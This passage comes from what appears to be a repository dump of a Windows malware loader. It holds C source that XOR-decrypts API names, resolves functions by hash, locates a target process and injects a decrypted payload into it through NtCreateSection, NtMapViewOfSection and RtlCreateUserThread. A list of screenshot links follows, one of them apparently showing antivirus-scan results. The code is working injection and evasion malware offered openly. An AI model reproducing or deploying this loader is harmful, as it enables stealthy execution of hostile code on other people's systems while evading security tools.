s_p32n_len, s_p32n_key, sizeof(s_p32n_key)); 283 | pProcess32Next myProcess32Next = (pProcess32Next)myGetProcAddress(hk32, s_p32n); 284 | 285 | XOR((char *) s_ct32s, s_ct32s_len, s_ct32s_key, sizeof(s_ct32s_key)); 286 | pCreateToolhelp32Snapshot myCreateToolhelp32Snapshot = (pCreateToolhelp32Snapshot)myGetProcAddress(hk32, s_ct32s); 287 | 288 | // snapshot of all processes in the system 289 | hSnapshot = myCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 290 | if (INVALID_HANDLE_VALUE == hSnapshot) return 0; 291 | 292 | // initializing size: needed for using Process32First 293 | pe.dwSize = sizeof(PROCESSENTRY32); 294 | 295 | // info about first process encountered in a system snapshot 296 | hResult = myProcess32First(hSnapshot, &pe); 297 | 298 | // retrieve information about the processes 299 | // and exit if unsuccessful 300 | while (hResult) { 301 | // if we find the process: return process ID 302 | if (strcmp(procname, pe.szExeFile) == 0) { 303 | pid = pe.th32ProcessID; 304 | break; 305 | } 306 | hResult = myProcess32Next(hSnapshot, &pe); 307 | } 308 | 309 | // closes an open handle (CreateToolhelp32Snapshot) 310 | myCloseHandle(hSnapshot); 311 | return pid; 312 | } 313 | 314 | // int main(int argc, char* argv[]) { 315 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 316 | 317 | SIZE_T s = 4096; 318 | LARGE_INTEGER sectionS = { s }; 319 | HANDLE sh = NULL; // section handle 320 | PVOID lb = NULL; // local buffer 321 | PVOID rb = NULL; // remote buffer 322 | HANDLE th = NULL; // thread handle 323 | DWORD pid; // process ID 324 | 325 | HMODULE mod = getKernel32(KERNEL32_HASH); 326 | pGetModuleHandleA myGetModuleHandleA = (pGetModuleHandleA)getAPIAddr(mod, GETMODULEHANDLE_HASH); 327 | pGetProcAddress myGetProcAddress = (pGetProcAddress)getAPIAddr(mod, GETPROCADDRESS_HASH); 328 | HMODULE hk32 = myGetModuleHandleA(s_k32); 329 | 330 | // decrypt kernel32.dll 331 | XOR((char *) s_k32, s_k32_len, k32_key, sizeof(k32_key)); 332 | 333 | // decrypt CloseHandle 334 | XOR((char *) s_clh, s_clh_len, s_clh_key, sizeof(s_clh_key)); 335 | pCloseHandle myCloseHandle = (pCloseHandle)myGetProcAddress(hk32, s_clh); 336 | 337 | // decrypt process name 338 | XOR((char *) my_proc, my_proc_len, my_proc_key, sizeof(my_proc_key)); 339 | 340 | pid = findMyProc(my_proc); 341 | 342 | OBJECT_ATTRIBUTES oa; 343 | CLIENT_ID cid; 344 | InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL); 345 | cid.UniqueProcess = (PVOID) pid; 346 | cid.UniqueThread = 0; 347 | 348 | // decrypt ntdll.dll 349 | XOR((char *) s_ntd, s_ntd_len, ntd_key, sizeof(ntd_key)); 350 | 351 | // decrypt NtOpenProcess 352 | XOR((char *) s_ntop, s_ntop_len, s_ntop_key, sizeof(s_ntop_key)); 353 | 354 | // decrypt NtCreateSection 355 | XOR((char *) s_ntcs, s_ntcs_len, s_ntcs_key, sizeof(s_ntcs_key)); 356 | 357 | // decrypt NtMapViewOfSection 358 | XOR((char *) s_ntmvos, s_ntmvos_len, s_ntmvos_key, sizeof(s_ntmvos_key)); 359 | 360 | // RtlCreateUserThread 361 | XOR((char *) s_rcut, s_rcut_len, s_rcut_key, sizeof(s_rcut_key)); 362 | 363 | // decrypt ZwUnmapViewOfSection 364 | XOR((char *) s_zw, s_zw_len, s_zw_key, sizeof(s_zw_key)); 365 | 366 | // loading ntdll.dll 367 | HANDLE ntdll = myGetModuleHandleA(s_ntd); 368 | 369 | /* 370 | printf("NTOP: %s\n", (char *)s_ntop); 371 | printf("NTCS: %s\n", (char *)s_ntcs); 372 | printf("NTMVOS: %s\n", (char *)s_ntmvos); 373 | printf("RCUT: %s\n", (char *)s_rcut); 374 | printf("ZW: %s\n", (char *)s_zw); 375 | */ 376 | 377 | pNtOpenProcess myNtOpenProcess = (pNtOpenProcess)myGetProcAddress(ntdll, s_ntop); 378 | pNtCreateSection myNtCreateSection = (pNtCreateSection)myGetProcAddress(ntdll, s_ntcs); 379 | pNtMapViewOfSection myNtMapViewOfSection = (pNtMapViewOfSection)myGetProcAddress(ntdll, s_ntmvos); 380 | pRtlCreateUserThread myRtlCreateUserThread = (pRtlCreateUserThread)myGetProcAddress(ntdll, s_rcut); 381 | pZwUnmapViewOfSection myZwUnmapViewOfSection = (pZwUnmapViewOfSection)myGetProcAddress(ntdll, s_zw); 382 | 383 | // create a memory section 384 | myNtCreateSection(&sh, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)§ionS, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL); 385 | 386 | // bind the object in the memory of our process for reading and writing 387 | myNtMapViewOfSection(sh, GetCurrentProcess(), &lb, NULL, NULL, NULL, &s, 2, NULL, PAGE_READWRITE); 388 | 389 | // open remote proces via NT API 390 | HANDLE ph = NULL; 391 | myNtOpenProcess(&ph, PROCESS_ALL_ACCESS, &oa, &cid); 392 | 393 | if (!ph) { 394 | printf("failed to open process :(\n"); 395 | return -2; 396 | } 397 | 398 | // bind the object in the memory of the target process for reading and executing 399 | myNtMapViewOfSection(sh, ph, &rb, NULL, NULL, NULL, &s, 2, NULL, PAGE_EXECUTE_READ); 400 | 401 | // decrypt payload 402 | XOR((char *) my_payload, my_payload_len, my_payload_key, sizeof(my_payload_key)); 403 | 404 | // write payload 405 | memcpy(lb, my_payload, sizeof(my_payload)); 406 | 407 | //printf("current = %p\n", lb); 408 | //printf("target = %p\n", rb); 409 | 410 | // create a thread 411 | myRtlCreateUserThread(ph, NULL, FALSE, 0, 0, 0, rb, NULL, &th, NULL); 412 | 413 | // decrypt WaitForSingleObject function call 414 | XOR((char *) s_wfso, s_wfso_len, s_wfso_key, sizeof(s_wfso_key)); 415 | pWaitForSingleObject myWaitForSingleObject = (pWaitForSingleObject)myGetProcAddress(hk32, s_wfso); 416 | 417 | // and wait 418 | if (myWaitForSingleObject(th, INFINITE) == WAIT_FAILED) { 419 | return -2; 420 | } 421 | 422 | // clean up 423 | myZwUnmapViewOfSection(GetCurrentProcess(), lb); 424 | myZwUnmapViewOfSection(ph, rb); 425 | myCloseHandle(sh); 426 | myCloseHandle(ph); 427 | return 0; 428 | } 429 | -------------------------------------------------------------------------------- /screenshots/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/1.png -------------------------------------------------------------------------------- /screenshots/10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/10.png -------------------------------------------------------------------------------- /screenshots/11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/11.png -------------------------------------------------------------------------------- /screenshots/12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/12.png -------------------------------------------------------------------------------- /screenshots/13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/13.png -------------------------------------------------------------------------------- /screenshots/14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/14.png -------------------------------------------------------------------------------- /screenshots/15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/15.png -------------------------------------------------------------------------------- /screenshots/16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/16.png -------------------------------------------------------------------------------- /screenshots/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/2.png -------------------------------------------------------------------------------- /screenshots/2022-04-24_13-05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/2022-04-24_13-05.png -------------------------------------------------------------------------------- /screenshots/2022-04-24_13-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/2022-04-24_13-08.png -------------------------------------------------------------------------------- /screenshots/2022-04-24_13-11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/2022-04-24_13-11.png -------------------------------------------------------------------------------- /screenshots/2022-04-24_13-12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/2022-04-24_13-12.png -------------------------------------------------------------------------------- /screenshots/2022-04-24_13-13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/2022-04-24_13-13.png -------------------------------------------------------------------------------- /screenshots/2022-04-24_13-18.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/2022-04-24_13-18.png -------------------------------------------------------------------------------- /screenshots/2022-04-24_13-20.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/2022-04-24_13-20.png -------------------------------------------------------------------------------- /screenshots/2022-04-24_13-22.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/2022-04-24_13-22.png -------------------------------------------------------------------------------- /screenshots/2022-04-24_13-25.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/2022-04-24_13-25.png -------------------------------------------------------------------------------- /screenshots/2022-04-24_13-27.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/2022-04-24_13-27.png -------------------------------------------------------------------------------- /screenshots/2022-04-24_13-29.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/2022-04-24_13-29.png -------------------------------------------------------------------------------- /screenshots/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/3.png -------------------------------------------------------------------------------- /screenshots/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/4.png -------------------------------------------------------------------------------- /screenshots/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/5.png -------------------------------------------------------------------------------- /screenshots/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/6.png -------------------------------------------------------------------------------- /screenshots/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/7.png -------------------------------------------------------------------------------- /screenshots/8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/8.png -------------------------------------------------------------------------------- /screenshots/9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/9.png -------------------------------------------------------------------------------- /screenshots/antiscan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/antiscan.png -------------------------------------------------------------------------------- /screenshots/websec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/peekaboo/c3a990c59bf16fb508f782b7df6780c59eccafc8/screenshots/websec.png --------------------------------------------------------------------------------